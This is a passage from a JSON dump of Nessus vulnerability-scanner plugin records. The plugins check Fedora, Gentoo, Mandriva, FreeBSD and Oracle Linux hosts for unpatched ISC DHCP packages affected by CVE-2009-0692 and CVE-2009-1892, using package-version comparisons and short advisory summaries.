script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_bugtraq_id(35668, 35669);\n script_xref(name:\"FEDORA\", value:\"2009-8344\");\n\n script_name(english:\"Fedora 10 : dhcp-4.0.0-37.fc10 (2009-8344)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to the dhcp package includes fixes for CVE-2009-0692 and\nCVE-2009-1892. More information on these issues are available here:\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892 Note:\nCVE-2009-0692 had no security consequences on Fedora, thanks to the\nuse of FORTIFY_SOURCE\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511834\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028447.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed5ea1ec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"dhcp-4.0.0-37.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:55:53", "description": "Do not require policycoreutils when installing dhcp or dhclient packages. If you have the package installed, the /sbin/restorecon program will be used by dhclient-script and the dhcpd init script.\nThis update to the dhcp package includes fixes for CVE-2009-0692 and CVE-2009-1892. More information on these issues are available here:\nhttps://vulners.com/cve/CVE-2009-0692 https://vulners.com/cve/CVE-2009-1892 Note:\nCVE-2009-0692 had no security consequences on Fedora, thanks to the use of FORTIFY_SOURCE\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-11-11T00:00:00", "type": "nessus", "title": "Fedora 11 : dhcp-4.1.0p1-4.fc11 (2009-9075)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dhcp", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-9075.NASL", "href": "https://www.tenable.com/plugins/nessus/42454", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-9075.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42454);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_bugtraq_id(35668, 35669);\n script_xref(name:\"FEDORA\", value:\"2009-9075\");\n\n script_name(english:\"Fedora 11 : dhcp-4.1.0p1-4.fc11 (2009-9075)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Do not require policycoreutils when installing dhcp or dhclient\npackages. If you have the package installed, the /sbin/restorecon\nprogram will be used by dhclient-script and the dhcpd init script.\nThis update to the dhcp package includes fixes for CVE-2009-0692 and\nCVE-2009-1892. More information on these issues are available here:\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892 Note:\nCVE-2009-0692 had no security consequences on Fedora, thanks to the\nuse of FORTIFY_SOURCE\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=519479\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-November/030836.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0639bd73\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"dhcp-4.1.0p1-4.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:07:54", "description": "The remote host is affected by the vulnerability described in GLSA-200908-08 (ISC DHCP: dhcpd Denial of Service)\n\n Christoph Biedl discovered that dhcpd does not properly handle certain DHCP requests when configured both using 'dhcp-client-identifier' and 'hardware ethernet'.\n Impact :\n\n A remote attacker might send a specially crafted request to dhcpd, possibly resulting in a Denial of Service (daemon crash).\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2009-08-20T00:00:00", "type": "nessus", "title": "GLSA-200908-08 : ISC DHCP: dhcpd Denial of Service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:dhcp"], "id": "GENTOO_GLSA-200908-08.NASL", "href": "https://www.tenable.com/plugins/nessus/40633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200908-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40633);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1892\");\n script_bugtraq_id(35669);\n script_xref(name:\"GLSA\", value:\"200908-08\");\n\n script_name(english:\"GLSA-200908-08 : ISC DHCP: dhcpd Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200908-08\n(ISC DHCP: dhcpd Denial of Service)\n\n Christoph Biedl discovered that dhcpd does not properly handle certain\n DHCP requests when configured both using 'dhcp-client-identifier' and\n 'hardware ethernet'.\n \nImpact :\n\n A remote attacker might send a specially crafted request to dhcpd,\n possibly resulting in a Denial of Service (daemon crash).\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200908-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ISC DHCP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dhcp-3.1.2_p1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/dhcp\", unaffected:make_list(\"ge 3.1.2_p1\"), vulnerable:make_list(\"lt 3.1.2_p1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ISC DHCP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:39", "description": "A vulnerability has been found and corrected in ISC DHCP :\n\nISC DHCP Server is vulnerable to a denial of service, caused by the improper handling of DHCP requests. If the host definitions are mixed using dhcp-client-identifier and hardware ethernet, a remote attacker could send specially crafted DHCP requests to cause the server to stop responding (CVE-2009-1892).\n\nThis update provides fixes for this vulnerability.", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : dhcp (MDVSA-2009:154)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dhcp-client", "p-cpe:/a:mandriva:linux:dhcp-common", "p-cpe:/a:mandriva:linux:dhcp-devel", "p-cpe:/a:mandriva:linux:dhcp-doc", "p-cpe:/a:mandriva:linux:dhcp-relay", "p-cpe:/a:mandriva:linux:dhcp-server", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2009.1"], "id": "MANDRIVA_MDVSA-2009-154.NASL", "href": "https://www.tenable.com/plugins/nessus/39873", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:154. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39873);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1892\");\n script_bugtraq_id(35669);\n script_xref(name:\"MDVSA\", value:\"2009:154\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dhcp (MDVSA-2009:154)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in ISC DHCP :\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially crafted DHCP requests to cause the server to stop\nresponding (CVE-2009-1892).\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.archive.org/web/20130329205622/http://xforce.iss.net/xforce/xfdb/51717\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-client-3.0.7-0.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-common-3.0.7-0.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-devel-3.0.7-0.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-doc-3.0.7-0.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-relay-3.0.7-0.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-server-3.0.7-0.2mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-client-3.0.7-1.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-common-3.0.7-1.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-devel-3.0.7-1.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-doc-3.0.7-1.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-relay-3.0.7-1.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"dhcp-server-3.0.7-1.4mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-client-4.1.0-5.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-common-4.1.0-5.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-devel-4.1.0-5.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-doc-4.1.0-5.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-relay-4.1.0-5.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dhcp-server-4.1.0-5.2mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:37", "description": "US-CERT reports :\n\nThe ISC DHCP dhclient application contains a stack-based buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code with root privileges.", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "nessus", "title": "FreeBSD : isc-dhcp-client -- Stack overflow vulnerability (c444c8b7-7169-11de-9ab7-000c29a67389)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:isc-dhcp30-client", "p-cpe:/a:freebsd:freebsd:isc-dhcp31-client", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C444C8B7716911DE9AB7000C29A67389.NASL", "href": "https://www.tenable.com/plugins/nessus/39802", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39802);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_xref(name:\"CERT\", value:\"410676\");\n script_xref(name:\"Secunia\", value:\"35785\");\n\n script_name(english:\"FreeBSD : isc-dhcp-client -- Stack overflow vulnerability (c444c8b7-7169-11de-9ab7-000c29a67389)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"US-CERT reports :\n\nThe ISC DHCP dhclient application contains a stack-based buffer overflow,\nwhich may allow a remote, unauthenticated attacker to execute\narbitrary code with root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.isc.org/node/468\"\n );\n # https://vuxml.freebsd.org/freebsd/c444c8b7-7169-11de-9ab7-000c29a67389.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb8f1b0c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:isc-dhcp30-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:isc-dhcp31-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"isc-dhcp31-client<=3.1.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"isc-dhcp30-client<3.0.7_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:14:07", "description": "From Red Hat Security Advisory 2009:1136 :\n\nUpdated dhcp packages that fix a security issue are now available for Red Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : dhcp (ELSA-2009-1136)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": 